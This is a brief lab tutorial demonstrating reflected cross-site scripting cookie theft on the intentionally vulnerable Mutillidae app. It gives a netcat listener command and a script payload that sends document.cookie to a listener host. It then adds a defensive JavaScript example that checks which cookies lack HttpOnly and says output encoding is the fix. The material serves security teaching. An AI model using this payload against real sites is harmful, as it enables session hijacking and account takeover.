Cookie Theft with Cross-site Scripting (XSS)

A simple proof of concept for stealing cookies from a page vulnerable to XSS. Using Mutillidae as the vulnerable application, I’ll perform reflected cross-site scripting against myself and steal my own session cookie.

First, I’ll set up a listener using Netcat:

C:\Tools>nc -nlvp 4321

Next, I’ll navigate to the vulnerable page.

In the input field of the vulnerable page, I’ll enter my demo JavaScript, which redirects the browser to my listener with document.cookie appended to the URL:

<script>document.location='http://192.168.0.6:4321/cgi-bin/grab.cgi?'+document.cookie;</script>


When I click the “Lookup DNS” button, the JavaScript executes and the browser requests the listener URL, so my cookie value arrives at my Netcat listener in the query string of the request.
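The payload above can only send what document.cookie returns, and that excludes any cookie set with the HttpOnly attribute. The following is an added example, not code from the original post: it parses Set-Cookie headers and reports which cookies script on the page could read. The sample headers, cookie names and values are constructed placeholders, and Path/Domain scoping is ignored for simplicity.

```javascript
// Added example: which cookies would a document.cookie payload expose?
// Sample headers are constructed; names and values are placeholders.
const sampleSetCookie = [
  'PHPSESSID=placeholder-session-id; path=/',
  'auth=placeholder-token; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; SameSite=Strict',
];

// Parse one Set-Cookie header value into name, value and attribute flags.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) return null; // no cookie name: not a usable cookie
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val = ''] = attr.split('=').map((s) => s.trim());
    switch (key.toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure': cookie.secure = true; break;
      case 'samesite': cookie.sameSite = val || null; break;
    }
  }
  return cookie;
}

// Cookies without HttpOnly are the ones script on the page can read.
function scriptReadable(headers) {
  return headers.map(parseSetCookie).filter((c) => c && !c.httpOnly);
}

// The string an injected script would see in document.cookie.
function documentCookieView(headers) {
  return scriptReadable(headers).map((c) => `${c.name}=${c.value}`).join('; ');
}

// Audit finding: names of cookies that lack the HttpOnly attribute.
function missingHttpOnly(headers) {
  return scriptReadable(headers).map((c) => c.name);
}

console.log('document.cookie would be:', documentCookieView(sampleSetCookie));
console.log('missing HttpOnly:', missingHttpOnly(sampleSetCookie));
```

In the constructed sample, the session cookie is set without HttpOnly and therefore appears in the leaked string; the `auth` cookie does not. HttpOnly limits what this payload can read but does not fix the injection itself, which still requires output encoding on the reflected field.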
